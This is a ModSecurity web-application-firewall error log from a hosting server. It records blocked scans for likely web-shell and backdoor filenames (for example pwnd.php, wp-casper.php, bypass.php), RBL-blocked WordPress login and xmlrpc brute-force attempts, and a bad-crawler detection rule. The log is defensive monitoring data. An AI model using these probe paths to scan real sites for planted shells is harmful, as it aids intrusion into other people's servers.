[Tue May 26 13:50:36.575239 2026] [security2:error] [pid 555743:tid 555960] [client 15.235.169.50:61625] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/assets/dropdown.php"] [unique_id "ahVX1MjqAquC0YaxQjC09QAAAWE"]
[Tue May 26 13:50:36.937547 2026] [security2:error] [pid 560287:tid 560487] [client 103.240.99.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVX1JmX5s6sDS3wJVcTtAAAAMY"], referer: https://www.anujtradingco.com/
[Tue May 26 13:50:37.051776 2026] [security2:error] [pid 555743:tid 555875] [client 15.235.169.50:61720] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/class-wp-session-tokens-ajax.php"] [unique_id "ahVX1cjqAquC0YaxQjC0_gAAAQw"]
[Tue May 26 13:50:37.536312 2026] [security2:error] [pid 560287:tid 560472] [client 15.235.169.50:61774] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/index.php.suspected"] [unique_id "ahVX1ZmX5s6sDS3wJVcTwAAAALg"]
[Tue May 26 13:50:37.993973 2026] [security2:error] [pid 555743:tid 555904] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX1cjqAquC0YaxQjC1CQAAASk"]
[Tue May 26 13:50:38.002807 2026] [security2:error] [pid 555743:tid 555981] [client 15.235.169.50:61846] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/ini.php"] [unique_id "ahVX1sjqAquC0YaxQjC1EQAAAXY"]
[Tue May 26 13:50:38.251991 2026] [security2:error] [pid 560287:tid 560552] [client 103.240.99.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVX1pmX5s6sDS3wJVcTzAAAAQQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431019&moderation-hash=fd79c7ba842f043545fdc763b9a0755e
[Tue May 26 13:50:38.464520 2026] [security2:error] [pid 560287:tid 560435] [client 15.235.169.50:61921] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/termps.php.suspected"] [unique_id "ahVX1pmX5s6sDS3wJVcT0QAAAJY"]
[Tue May 26 13:50:38.934765 2026] [security2:error] [pid 555743:tid 555895] [client 15.235.169.50:61986] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/wp-conflg.php.suspected"] [unique_id "ahVX1sjqAquC0YaxQjC1IQAAASA"]
[Tue May 26 13:50:39.423733 2026] [security2:error] [pid 560287:tid 560539] [client 15.235.169.50:62044] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/travel/issue.phpp"] [unique_id "ahVX15mX5s6sDS3wJVcT5AAAAPc"]
[Tue May 26 13:50:39.502703 2026] [security2:error] [pid 560287:tid 560465] [client 85.208.96.193:34800] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/7/"] [unique_id "ahVX15mX5s6sDS3wJVcT5gAAALI"]
[Tue May 26 13:50:39.502879 2026] [security2:error] [pid 560287:tid 560465] [client 85.208.96.193:34800] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/7/"] [unique_id "ahVX15mX5s6sDS3wJVcT5gAAALI"]
[Tue May 26 13:50:39.770707 2026] [security2:error] [pid 560287:tid 560500] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX15mX5s6sDS3wJVcT4QAAANM"]
[Tue May 26 13:50:39.881947 2026] [security2:error] [pid 560287:tid 560519] [client 15.235.169.50:62112] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/wp-tinymce.php"] [unique_id "ahVX15mX5s6sDS3wJVcT7QAAAOU"]
[Tue May 26 13:50:40.021574 2026] [security2:error] [pid 560287:tid 560431] [client 106.192.248.115:65503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVX2JmX5s6sDS3wJVcT8AAAAJI"]
[Tue May 26 13:50:40.021693 2026] [security2:error] [pid 560287:tid 560431] [client 106.192.248.115:65503] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVX2JmX5s6sDS3wJVcT8AAAAJI"]
[Tue May 26 13:50:40.144374 2026] [security2:error] [pid 555743:tid 555925] [client 129.222.147.134:26141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVX2MjqAquC0YaxQjC1MQAAAT4"]
[Tue May 26 13:50:40.144500 2026] [security2:error] [pid 555743:tid 555925] [client 129.222.147.134:26141] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVX2MjqAquC0YaxQjC1MQAAAT4"]
[Tue May 26 13:50:40.352531 2026] [security2:error] [pid 560287:tid 560449] [client 15.235.169.50:62167] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/css/wp-blog.php"] [unique_id "ahVX2JmX5s6sDS3wJVcT-QAAAKM"]
[Tue May 26 13:50:40.581263 2026] [security2:error] [pid 560287:tid 560472] [client 149.20.244.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVX2JmX5s6sDS3wJVcUAQAAALg"], referer: https://www.anujtradingco.com/
[Tue May 26 13:50:40.817321 2026] [security2:error] [pid 560287:tid 560464] [client 15.235.169.50:62262] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/upfile.php"] [unique_id "ahVX2JmX5s6sDS3wJVcUBwAAALE"]
[Tue May 26 13:50:41.209324 2026] [security2:error] [pid 555743:tid 555847] [remote 143.198.237.186:36924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 186.237.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVX2cjqAquC0YaxQjC1OgABd2c"]
[Tue May 26 13:50:41.298650 2026] [security2:error] [pid 560287:tid 560523] [client 15.235.169.50:62329] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/pwnd/pwnd.php"] [unique_id "ahVX2ZmX5s6sDS3wJVcUFAAAAOk"]
[Tue May 26 13:50:41.653776 2026] [security2:error] [pid 555743:tid 555963] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX2cjqAquC0YaxQjC1PgAAAWQ"]
[Tue May 26 13:50:41.800081 2026] [security2:error] [pid 560287:tid 560445] [client 15.235.169.50:62390] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/irrrndex.php"] [unique_id "ahVX2ZmX5s6sDS3wJVcUIAAAAJ8"]
[Tue May 26 13:50:42.025565 2026] [security2:error] [pid 560287:tid 560424] [client 149.20.244.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVX2ZmX5s6sDS3wJVcUJAAAAIs"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1249610&moderation-hash=c47d059cfefba4a1f0afca58e3786cff
[Tue May 26 13:50:42.282858 2026] [security2:error] [pid 555743:tid 555916] [client 15.235.169.50:62453] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/plugins/compat3x/css/wp-casper.php"] [unique_id "ahVX2sjqAquC0YaxQjC1TAAAATU"]
[Tue May 26 13:50:42.772451 2026] [security2:error] [pid 560287:tid 560481] [client 15.235.169.50:62521] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/bypass.php"] [unique_id "ahVX2pmX5s6sDS3wJVcUOAAAAMA"]
[Tue May 26 13:50:43.210026 2026] [security2:error] [pid 555743:tid 555883] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX2sjqAquC0YaxQjC1UQAAARQ"]
[Tue May 26 13:50:43.241002 2026] [security2:error] [pid 560287:tid 560422] [client 15.235.169.50:62581] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/css/auth.php"] [unique_id "ahVX25mX5s6sDS3wJVcUQQAAAIk"]
[Tue May 26 13:50:43.719597 2026] [security2:error] [pid 555743:tid 555998] [client 15.235.169.50:62655] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wordpress/logsxxyyzz.php"] [unique_id "ahVX28jqAquC0YaxQjC1XQAAAYc"]
[Tue May 26 13:50:44.210162 2026] [security2:error] [pid 560287:tid 560551] [client 15.235.169.50:62750] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/css/default.php"] [unique_id "ahVX3JmX5s6sDS3wJVcUUwAAAQM"]
[Tue May 26 13:50:44.439250 2026] [security2:error] [pid 555743:tid 555919] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX3MjqAquC0YaxQjC1ZgAAATg"]
[Tue May 26 13:50:44.668153 2026] [security2:error] [pid 555743:tid 555922] [client 15.235.169.50:62810] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/class-wp-editor-cron.php"] [unique_id "ahVX3MjqAquC0YaxQjC1cgAAATs"]
[Tue May 26 13:50:44.754720 2026] [security2:error] [pid 560287:tid 560470] [client 45.133.170.121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVX3JmX5s6sDS3wJVcUXwAAALY"]
[Tue May 26 13:50:44.969154 2026] [security2:error] [pid 560287:tid 560477] [client 149.20.244.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVX3JmX5s6sDS3wJVcUYQAAAL0"], referer: https://anujtradingco.com
[Tue May 26 13:50:45.128114 2026] [security2:error] [pid 555743:tid 555886] [client 15.235.169.50:62870] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/rest-api/class-wp-rest-report.php"] [unique_id "ahVX3cjqAquC0YaxQjC1fAAAARc"]
[Tue May 26 13:50:45.540558 2026] [security2:error] [pid 560287:tid 560526] [client 45.133.170.121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVX3ZmX5s6sDS3wJVcUdQAAAOw"], referer: https://www.anujtradingco.com/my-tech-travel-setup/
[Tue May 26 13:50:45.611209 2026] [security2:error] [pid 560287:tid 560504] [client 15.235.169.50:62920] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/feed-rdp.php"] [unique_id "ahVX3ZmX5s6sDS3wJVcUdwAAANY"]
[Tue May 26 13:50:46.086771 2026] [security2:error] [pid 560287:tid 560495] [client 15.235.169.50:62993] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/css/radio.php"] [unique_id "ahVX3pmX5s6sDS3wJVcUhAAAAM4"]
[Tue May 26 13:50:46.574467 2026] [security2:error] [pid 560287:tid 560505] [client 15.235.169.50:63051] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-activate.php"] [unique_id "ahVX3pmX5s6sDS3wJVcUjgAAANc"]
[Tue May 26 13:50:46.758058 2026] [security2:error] [pid 560287:tid 560430] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX3pmX5s6sDS3wJVcUigAAAJE"]
[Tue May 26 13:50:47.044036 2026] [security2:error] [pid 560287:tid 560525] [client 15.235.169.50:63131] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/js/file.php"] [unique_id "ahVX35mX5s6sDS3wJVcUlAAAAOs"]
[Tue May 26 13:50:47.132294 2026] [security2:error] [pid 555743:tid 555939] [client 103.240.99.165:64874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.99.240.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVX3sjqAquC0YaxQjC1lwAAAUw"], referer: https://anujtradingco.com
[Tue May 26 13:50:47.536786 2026] [security2:error] [pid 555743:tid 555998] [client 15.235.169.50:63206] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/assets/library.php"] [unique_id "ahVX38jqAquC0YaxQjC1oAAAAYc"]
[Tue May 26 13:50:48.027575 2026] [security2:error] [pid 560287:tid 560485] [client 15.235.169.50:63282] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/fm.php"] [unique_id "ahVX4JmX5s6sDS3wJVcUpgAAAMQ"]
[Tue May 26 13:50:48.441553 2026] [security2:error] [pid 555743:tid 555995] [client 103.240.99.165:65275] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVX4MjqAquC0YaxQjC1sQAAAYQ"], referer: https://anujtradingco.com
[Tue May 26 13:50:48.494215 2026] [security2:error] [pid 555743:tid 555971] [client 15.235.169.50:63353] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/css/colors/coffee/wp-casper.php"] [unique_id "ahVX4MjqAquC0YaxQjC1tAAAAWw"]
[Tue May 26 13:50:48.574185 2026] [security2:error] [pid 555743:tid 555919] [client 103.111.139.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX4MjqAquC0YaxQjC1qgAAATg"]
[Tue May 26 13:50:48.595263 2026] [security2:error] [pid 560287:tid 560499] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX4JmX5s6sDS3wJVcUqgAAANI"]
[Tue May 26 13:50:48.982548 2026] [security2:error] [pid 560287:tid 560457] [client 15.235.169.50:63426] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/defaults.php"] [unique_id "ahVX4JmX5s6sDS3wJVcUugAAAKo"]
[Tue May 26 13:50:49.468239 2026] [security2:error] [pid 560287:tid 560543] [client 15.235.169.50:63501] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/config.bak.php"] [unique_id "ahVX4ZmX5s6sDS3wJVcUxQAAAPs"]
[Tue May 26 13:50:49.961684 2026] [security2:error] [pid 555743:tid 555908] [client 15.235.169.50:63580] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/wcache.php"] [unique_id "ahVX4cjqAquC0YaxQjC1wgAAAS0"]
[Tue May 26 13:50:50.037019 2026] [security2:error] [pid 560287:tid 560498] [client 106.192.248.115:49510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVX4pmX5s6sDS3wJVcU0AAAANE"]
[Tue May 26 13:50:50.041589 2026] [security2:error] [pid 560287:tid 560498] [client 106.192.248.115:49510] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVX4pmX5s6sDS3wJVcU0AAAANE"]
[Tue May 26 13:50:50.312600 2026] [security2:error] [pid 555743:tid 555914] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX4cjqAquC0YaxQjC1wAAAATM"]
[Tue May 26 13:50:50.357536 2026] [security2:error] [pid 555743:tid 555967] [client 129.222.147.134:54977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVX4sjqAquC0YaxQjC1yQAAAWg"]
[Tue May 26 13:50:50.357686 2026] [security2:error] [pid 555743:tid 555967] [client 129.222.147.134:54977] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVX4sjqAquC0YaxQjC1yQAAAWg"]
[Tue May 26 13:50:50.429643 2026] [security2:error] [pid 560287:tid 560551] [client 15.235.169.50:63680] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/images/image.php"] [unique_id "ahVX4pmX5s6sDS3wJVcU2gAAAQM"]
[Tue May 26 13:50:50.922564 2026] [security2:error] [pid 560287:tid 560458] [client 15.235.169.50:63756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/robots.php"] [unique_id "ahVX4pmX5s6sDS3wJVcU5QAAAKs"]
[Tue May 26 13:50:51.388091 2026] [security2:error] [pid 560287:tid 560486] [client 15.235.169.50:63832] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/filemanager/dialog.php"] [unique_id "ahVX45mX5s6sDS3wJVcU8QAAAMU"]
[Tue May 26 13:50:51.485354 2026] [security2:error] [pid 560287:tid 560418] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVX45mX5s6sDS3wJVcU6AAAAIU"]
[Tue May 26 13:50:51.679777 2026] [security2:error] [pid 560287:tid 560298] [remote 103.11.102.106:33436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVX45mX5s6sDS3wJVcU8gAAjQo"]
[Tue May 26 13:50:51.858734 2026] [security2:error] [pid 555743:tid 555907] [client 15.235.169.50:63894] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/cache/plugins.php"] [unique_id "ahVX48jqAquC0YaxQjC11gAAASw"]
[Tue May 26 13:50:52.327472 2026] [security2:error] [pid 555743:tid 555997] [client 15.235.169.50:63942] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/bitrix/cache/network.php"] [unique_id "ahVX5MjqAquC0YaxQjC14AAAAYY"]
